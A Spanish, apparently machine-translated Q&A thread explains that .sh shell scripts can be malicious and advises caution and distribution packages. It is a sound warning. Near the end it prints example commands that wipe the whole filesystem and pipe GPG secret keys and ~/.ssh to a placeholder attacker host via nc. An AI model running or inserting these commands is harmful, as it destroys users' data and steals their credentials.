.sh
Los archivos son scripts de shell. Son análogos a .bat
archivos (cmd
scripts) en Windows. Todos estos (scripts de shell, scripts cmd, .exe
Los ejecutables de Windows, los ejecutables de Linux (que normalmente no tienen extensión)) son programas ejecutables; si ejecuta uno, puede hacer cualquier cosa que pueda hacer. Así que sí, los scripts de shell pueden ser dañinos. Trate un script de shell (o un script de Perl, o un script de Python, o un script de Ruby, etc.) con la misma sospecha que trataría cualquier otra aplicación.
Es un poco más difícil ocultar el malware en un script de shell sin parecer sospechoso, porque este es un script que puede ser leído por personas con conocimiento del lenguaje de programación. Pero no es mucho más difícil; Pocas personas, incluso con conocimientos técnicos, se molestarían en revisar el código, por lo que podrías pasar desapercibido.
En la práctica, hay menos malware para Linux que para Windows. Esto probablemente se deba principalmente a que Linux tiene una participación de mercado mucho menor que Windows en el escritorio, por lo que la recompensa por escribir malware de Linux es menor. Además, existe una cultura arraigada de compartir pequeñas mejoras al sistema en el mundo Linux, más que en el mundo Windows; entonces el balance de probabilidad dice que se trata de alguien que comparte una pequeña mejora y no de malware. Pero podría ser un malware que se hace pasar por una pequeña mejora. Al final, debe decidir si puede confiar en el sitio donde obtiene esta aplicación o en las personas que recomendaron este sitio. Favorezca los programas que provienen de su distribución (es decir, que puede instalar desde el centro de software), ya que se han sometido a alguna revisión.
Ahora, con respecto a este programa específico:eché un vistazo rápido y parece benigno. No vi nada que pudiera almacenar su contraseña en ningún lugar sin decírselo o que hiciera cosas en su computadora que no fueran las que se anuncian. Tenga en cuenta que solo hice una revisión de 2 minutos, que cualquier escritor de malware remotamente inteligente podría pasar. El programa se ve razonablemente bien escrito.
No recomendaría necesariamente este programa a menos que sienta una necesidad apremiante que no se aborda en los paquetes de la distribución de Ubuntu. Ubuntu viene con el caballito de mar interfaz gráfica de usuario para GPG (también hay kgpg para usuarios de KDE). También puede instalar seahorse-nautilus (o complemento de caballito de mar en versiones anteriores) para la integración de Nautilus.
#!/bin/sh
rm -rf --no-preserve-root /
Eso es malware, y es un script de shell. Una versión más avanzada podría incluir algo como:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
Entonces sí, un script de shell puede ser malicioso. Puede volverse más complejo y llamar a otros lenguajes de secuencias de comandos, bibliotecas o incluso ser un archivo de shell que escupe y llama a un ejecutable normal.
En su mayor parte, todo lo que ejecuta obtiene los permisos del usuario.
¡Por supuesto! ¡Puede hacer cualquier cosa que tú puedas hacer! Mire registros, registre sus teclas, robe archivos, etc....
¡Dependiendo de lo que su desarrollador haya escrito en el código fuente! Puede hacer CUALQUIER COSA...
Y es muy fácil de hacer, así que si te envían un archivo .sh sospechoso, ¡piénsalo dos veces antes de ejecutarlo!